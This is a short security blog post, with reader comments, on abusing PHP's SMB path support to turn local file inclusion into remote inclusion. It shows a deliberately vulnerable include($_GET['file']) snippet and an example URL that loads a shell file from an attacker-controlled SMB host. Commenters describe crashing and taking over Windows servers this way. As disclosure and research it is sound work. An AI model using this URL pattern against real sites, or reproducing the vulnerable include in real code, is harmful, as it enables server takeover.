The reincarnation of the RFI

Hey! Remember the good old days when the web spouted RFI's everywhere?

We miss those days.

So me and Fredrik figured out a new way to reincarnate the old dusty RFI's!
This is an unexpected feature in PHP that allows you to communicate with external servers even though allow_url_include = Off.

We eventually played around with an RFI playground we made and found out SMB is supported.

So what? SMB is only for internal networks?

Not so fast! If an attacker writes a rogue SMB server, just like Jelmer did in the "MySQL Network Exploitation Toolkit", he could remotely load a shell or send back a malicious payload to exploit one of the many vulnerabilities against SAMBA.

This will obviously require a RFI "patch" relying on allow_url_include on the server.

vulnerable.php:
[php]
...
if(isset($_GET['file']))
{
include($_GET['file']);
}
...
[/php]
Example URL:

http://www.vulnerablesite.com/includefile.php?file=\\1.3.3.7\shell.txt%00

And that's how you may turn an LFI into an RFI using SMB.

Note: This is still a theory, no PoC available yet.

Ciao bella!

Sup, I'm Mathias and I was born 1991. It feels like I should really write something here.

6 Comments

  1. Tweets that mention The reincarnation of the RFI -- Topsy.com says:

    [...] This post was mentioned on Twitter by AckAck, AckAck. AckAck said: New Post: The reincarnation of the RFI ( http://h.ackack.net/the-reincarnation-of-the-rfi.html ): Hey! Remember the good old day... [...]

  2. Jelmer de Hen says:

    I just tested this with the mysql network exploitation toolkit and it works great! windows SMB exploits work against the SMB client through this, I made my box BSoD with this.

  3. Fredrik Nordberg Almroth says:

    Hehe awesome :)
    As expected then ;)
    Hurray! No more psuedo lame LFI's!

  4. Jelmer de Hen says:

    Too bad it only works for windows because of the use of PHP’s SMB file wrappers; still it's good for getting system level access on windows servers or just generally exploring the internal network. You can also generate DNS and ARP packets with this which is pretty nice and fingerprinting the server will also be easy through SMB.

  5. Fredrik Nordberg Almroth says:

    Indeed. I noticed as well, it do also send NBNS (NetBIOS Name Service)-packets over IP-broadcast (255.255.255.255).
    But you failed to get it working on *nix?

  6. The reincarnation of the RFI | BlackRootKit's Blog says:

    [...] post: http://h.ackack.net/the-reincarnation-of-the-rfi.html Posted in Web Security | Tags: [...]

Leave a Comment